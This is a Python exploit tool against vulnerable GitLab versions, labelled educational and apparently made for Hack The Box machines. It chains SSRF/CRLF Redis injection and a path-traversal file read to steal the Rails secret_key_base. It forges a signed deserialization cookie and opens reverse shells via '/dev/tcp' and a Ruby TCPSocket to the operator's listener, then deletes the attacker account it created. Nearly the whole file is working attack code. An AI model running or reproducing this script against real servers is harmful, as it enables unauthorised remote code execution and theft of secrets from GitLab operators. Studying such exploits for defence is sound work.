""" |
Gitlab RCE+LFI version <= 11.4.7, 12.4.0-12.8.1 - EDUCATIONAL USE ONLY |
CVEs: CVE-2018-19571 (SSRF) + CVE-2018-19585 (CRLF) |
CVE-2020-10977 |
""" |
import base64 |
import hashlib |
import hmac |
from html.parser import HTMLParser |
import random |
import string |
import sys |
import time |
import urllib.parse |
import urllib3 |
import requests |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
class GitlabRCE: |
description = "oopsie woopsie we made a fucky wucky a wittle fucko boingo!" |
def __init__(self, gitlab_url, local_ip): |
self.url = gitlab_url |
self.local_ip = local_ip |
self.port = 42069 |
# change this if the gitlab has restricted email domains |
self.email_domain = "gmail.htb" |
self.session = requests.session() |
self.username = "" |
self.password = "" |
self.projects = [] |
self.issues = [] |
def get_authenticity_token(self, url, i=-1): |
result = self.session.get(url, verify=False) |
parser = GitlabParse() |
token = parser.feed(result.text, i) |
if not token: |
print("could not get token!") |
self.abort() |
return token |
def randomize(self): |
sequence = string.ascii_letters + string.digits |
random_list = random.choices(sequence, k=10) |
random_string = "".join(random_list) |
return random_string |
def register_user(self): |
authenticity_token = self.get_authenticity_token(self.url + "/users/sign_in") |
self.username = self.randomize() |
self.password = self.randomize() |
email = "{}@{}".format(self.username, self.email_domain) |
data = {"new_user[email]": email, "new_user[email_confirmation]": email, "new_user[username]": self.username, |
"new_user[name]": self.username, "new_user[password]": self.password, |
"authenticity_token": authenticity_token} |
result = self.session.post(self.url + "/users", data=data, verify=False) |
print("registering {}:{} - {}".format(self.username, self.password, result.status_code)) |
def login_user(self): |
authenticity_token = self.get_authenticity_token(self.url + "/users/sign_in", 0) |
data = {"authenticity_token": authenticity_token, "user[login]": self.username, "user[password]": self.password} |
result = self.session.post(self.url + "/users/sign_in", data=data, verify=False) |
print(result.status_code) |
def delete_user(self): |
authenticity_token = self.get_authenticity_token(self.url + "/profile/account") |
data = {"authenticity_token": authenticity_token, "_method": "delete", "password": self.password} |
result = self.session.post(self.url + "/users", data=data, verify=False) |
print("delete user {} - {}".format(self.username, result.status_code)) |
def create_empty_project(self): |
authenticity_token = self.get_authenticity_token(self.url + "/projects/new") |
project = self.randomize() |
self.projects.append(project) |
data = {"authenticity_token": authenticity_token, "project[ci_cd_only]": "false", "project[name]": project, |
"project[path]": project, "project[visibility_level]": "0", |
"project[description]": "all your base are belong to us"} |
result = self.session.post(self.url + "/projects", data=data, verify=False) |
print("creating project {} - {}".format(project, result.status_code)) |
def create_issue(self, project_id, text): |
issue_link = "{}/{}/{}/issues".format(self.url, self.username, project_id) |
authenticity_token = self.get_authenticity_token(issue_link + "/new") |
issue_title = self.randomize() |
self.issues.append(issue_title) |
data = {"authenticity_token": authenticity_token, "issue[title]": issue_title, "issue[description]": text} |
result = self.session.post(issue_link, data=data, verify=False) |
print("creating issue {} for project {} - {}".format(issue_title, project_id, result.status_code)) |
def main(self): |
print("main is not implemented") |
def prepare_payload(self): |
print("prepare_payload is not implemented") |
def abort(self): |
print("Something went wrong! ABORT MISSION!") |
exit() |
class GitlabRCE1147(GitlabRCE): |
description = "RCE for Version <=11.4.7" |
def exploit_project_creation(self, payload): |
authenticity_token = self.get_authenticity_token(self.url + "/projects/new") |
project = self.randomize() |
self.projects.append(project) |
payload_template = """git://[0:0:0:0:0:ffff:]:6379/ |
multi |
sadd resque:gitlab:queues system_hook_push |
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|{payload} \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}" |
exec |
exec |
exec""" |
# using replace for formating is shit!! too bad... |
payload = payload_template.replace("{payload}", payload) |
data = {"authenticity_token": authenticity_token, "project[import_url]": payload, |
"project[ci_cd_only]": "false", "project[name]": project, |
"project[path]": project, "project[visibility_level]": "0", |
"project[description]": "all your base are belong to us"} |
result = self.session.post(self.url + "/projects", data=data, verify=False) |
print("hacking in progress - {}".format(result.status_code)) |
def prepare_payload(self): |
payload = "bash -i >& /dev/tcp/{}/{} 0>&1".format(self.local_ip, self.port) |
wrapper = "echo {base64_payload} | base64 -d | /bin/bash" |
base64_payload = base64.b64encode(payload.encode()).decode("utf-8") |
payload = wrapper.format(base64_payload=base64_payload) |
return payload |
def main(self): |
self.register_user() |
self.exploit_project_creation(self.prepare_payload()) |
time.sleep(10) |
self.delete_user() |
class GitlabRCE1281LFI(GitlabRCE): |
description = "LFI for version 10.4-12.8.1 and maybe more" |
def __init__(self, gitlab_url, local_ip, file_to_lfi="/etc/passwd"): |
super(GitlabRCE1281LFI, self).__init__(gitlab_url, local_ip) |
self.file_to_lfi = file_to_lfi |
def get_file(self, url, filename): |
print("Grabbing file {}".format(filename)) |
result = self.session.get(url, verify=False) |
return result.text |
def get_technical_id_of_project(self, project_id): |
url = "{}/{}/{}".format(self.url, self.username, project_id) |
result = self.session.get(url, verify=False) |
parser = ProjectIDParse() |
technical_id = parser.feed(result.text) |
return technical_id |
def extract_link_from_issue_json(self, issue_json, project_id): |
field = issue_json["description"] |
file_name = field[field.find("[") + 1:field.find("]")] |
file_path = field[field.find("(") + 1:field.find(")")] |
url = "{}/{}/{}{}".format(self.url, self.username, project_id, file_path) |
return url, file_name |
def lfi_path(self): |
return "![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../..{})".format( |
self.file_to_lfi) |
def exploit_move_issue(self): |
project = self.projects[0] |
other_project = self.projects[-1] |
url = "{}/{}/{}/issues/1".format(self.url, self.username, project) |
technical_project_id_other_project = self.get_technical_id_of_project(other_project) |
authenticity_token = self.get_authenticity_token(url) |
issue_json = {"move_to_project_id": technical_project_id_other_project} |
self.session.headers["X-CSRF-Token"] = authenticity_token |
self.session.headers["Referer"] = url |
result = self.session.post(url + "/move", json=issue_json, verify=False) |
print("moving issue from {} to {} - {}".format(project, other_project, result.status_code)) |
url, filename = self.extract_link_from_issue_json(result.json(), other_project) |
file_content = self.get_file(url, filename) |
return file_content |
def main(self): |
self.register_user() |
self.create_empty_project() |
self.create_empty_project() |
self.create_issue(self.projects[0], self.lfi_path()) |
file_content = self.exploit_move_issue() |
print(file_content) |
self.delete_user() |
class GitlabRCE1281RCE(GitlabRCE1281LFI): |
description = "RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP" |
def parse_secrets(self, secrets): |
secret_key_base = secrets[secrets.find("secret_key_base: ") + 17:secrets.find("otp_key_base") - 3] |
return secret_key_base |
def get_ruby_shit_byte(self): |
# ruby marshal REEEEEEEEEEEEEE |
length = len(self.local_ip) + len(str(self.port)) - 8 |
possible_shit_bytes = "jklmnopqrstuvw" |
return possible_shit_bytes[length] |
def build_payload(self, secret): |
payload = "\x04\bo:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\t:\x0E@instanceo:\bERB\b:\t@srcI\"{ruby_shit_byte}exit if fork;c=TCPSocket.new(\"{ip}\",{port});while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\x06:\x06ET:\x0E@filenameI\"\x061\x06;\tT:\f@linenoi\x06:\f@method:\vresult:\t@varI\"\f@result\x06;\tT:\x10@deprecatorIu:\x1FActiveSupport::Deprecation\x00\x06;\tT" |
payload = payload.replace("{ip}", self.local_ip).replace("{port}", str(self.port)).replace("{ruby_shit_byte}", |
self.get_ruby_shit_byte()) |
key = hashlib.pbkdf2_hmac("sha1", password=secret.encode(), salt=b"signed cookie", iterations=1000, dklen=64) |
base64_payload = base64.b64encode(payload.encode()) |
digest = hmac.new(key, base64_payload, digestmod=hashlib.sha1).hexdigest() |
return base64_payload.decode() + "--" + digest |
def send_payload(self, payload): |
cookie = {"experimentation_subject_id": payload} |
result = self.session.get(self.url + "/users/sign_in", cookies=cookie, verify=False) |
print("deploying payload - {}".format(result.status_code)) |
def main(self): |
self.file_to_lfi = "/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml" |
self.register_user() |
self.create_empty_project() |
self.create_empty_project() |
self.create_issue(self.projects[0], self.lfi_path()) |
file_contents = self.exploit_move_issue() |
secret = self.parse_secrets(file_contents) |
payload = self.build_payload(secret) |
self.send_payload(payload) |
self.delete_user() |
class GitlabRCE1281LFIUser(GitlabRCE1281LFI): |
def main(self): |
self.file_to_lfi = self.ask_for_lfi_path() |
super(GitlabRCE1281LFIUser, self).main() |
def ask_for_lfi_path(self): |
lfi_path = input( |
"please type in the fully qualified path of the file you want to LFI. Uses {} when left empty: ".format( |
self.file_to_lfi)) |
lfi_path = lfi_path.strip() |
if not lfi_path: |
return self.file_to_lfi |
return lfi_path |
class GitlabVersion(GitlabRCE): |
def test(self): |
try: |
result = self.session.get(self.url, verify=False) |
if result.status_code not in [200, 302]: |
raise Exception("Host {} seems down".format(self.url)) |
except Exception as e: |
print(e) |
self.abort() |
def get_version(self): |
result = self.session.get(self.url + "/help", verify=False) |
print("Getting version of {} - {}".format(self.url, result.status_code)) |
parse = VersionParse() |
version = parse.feed(result.text) |
return version |
def main(self): |
self.test() |
self.register_user() |
version = self.get_version() |
print("The Version seems to be {}! Choose wisely".format(version)) |
self.delete_user() |
if not version: |
print("Could not get version!") |
self.abort() |
class GitlabParse(HTMLParser): |
def __init__(self): |
super(GitlabParse, self).__init__() |
self.tokens = [] |
self.current_name = "" |
def handle_starttag(self, tag, attrs): |
if tag == "input": |
for name, value in attrs: |
if self.current_name == "authenticity_token" and name == "value": |
self.tokens.append(value) |
self.current_name = value |
elif tag == "meta": |
for name, value in attrs: |
if self.current_name == "csrf-token": |
self.tokens.append(value) |
self.current_name = value |
def feed(self, data, i): |
super(GitlabParse, self).feed(data) |
try: |
return self.tokens[i] |
except IndexError: |
return None |
class ProjectIDParse(HTMLParser): |
def __init__(self): |
super(ProjectIDParse, self).__init__() |
self.project_found = False |
self.project_id = None |
def feed(self, data): |
super(ProjectIDParse, self).feed(data) |
return self.project_id |
def handle_starttag(self, tag, attrs): |
for name, value in attrs: |
if self.project_found and name == "value": |
self.project_id = int(value) |
return |
self.project_found = name == "id" and value == "project_id" |
class VersionParse(HTMLParser): |
def __init__(self): |
super(VersionParse, self).__init__() |
self.found_version = False |
self.version = None |
def handle_starttag(self, tag, attrs): |
if tag == "a": |
for name, value in attrs: |
self.found_version = name == "href" and "/tags/v" in value |
def handle_data(self, data): |
if self.found_version and not self.version: |
self.version = data |
def feed(self, data): |
super(VersionParse, self).feed(data) |
return self.version |
class Runner: |
def __init__(self): |
self.available_classes = [GitlabRCE1147, GitlabRCE1281LFIUser, GitlabRCE1281RCE] |
self.local_ip = None |
self.gitlab_url = None |
self.run() |
def banner(self): |
print("Gitlab Exploit by dotPY [insert fancy ascii art]") |
def get_version(self): |
class_ = GitlabVersion(self.gitlab_url, self.local_ip) |
class_.main() |
def list_options_and_choose(self): |
number = None |
for i, class_ in enumerate(self.available_classes): |
print("[{}] - {} - {}".format(i, class_.__name__, class_.description)) |
while number not in range(len(self.available_classes)): |
try: |
number = int(input("type a number and hit enter to choose exploit: ")) |
except ValueError: |
pass |
return self.available_classes[number] |
def run_chosen_exploit(self, chosen_exploit): |
class_ = chosen_exploit(self.gitlab_url, self.local_ip) |
input("Start a listener on port {port} and hit enter (nc -vlnp {port})".format(port=class_.port)) |
class_.main() |
def run(self): |
args = sys.argv |
if len(args) != 3: |
print("usage: {} <http://gitlab:port> <local-ip>".format(args[0])) |
return |
else: |
self.gitlab_url = args[1] |
self.local_ip = args[2] |
self.start() |
def start(self): |
self.banner() |
self.get_version() |
class_ = self.list_options_and_choose() |
self.run_chosen_exploit(class_) |
r = Runner() |